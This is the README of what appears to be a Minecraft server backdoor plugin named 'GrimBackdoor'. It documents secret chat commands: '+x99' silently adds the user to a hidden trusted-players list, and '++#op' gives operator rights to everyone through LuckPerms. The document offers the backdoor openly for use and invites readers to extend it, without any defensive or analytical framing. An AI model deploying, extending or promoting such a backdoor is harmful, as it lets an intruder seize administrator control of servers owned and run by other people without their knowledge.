KuzeySRC/GrimBackdoor/README.md

 +x99 adds your acc to trusted players list that you can use commands.
 (It works if your nickname only has lowercase letters.)

++#op Gives op Everyone (works only on luckperms. you can edit the code if you want to add others)

 This commands only works if you are added to trusted players list except "+x99"

 You can edit the code the way you want.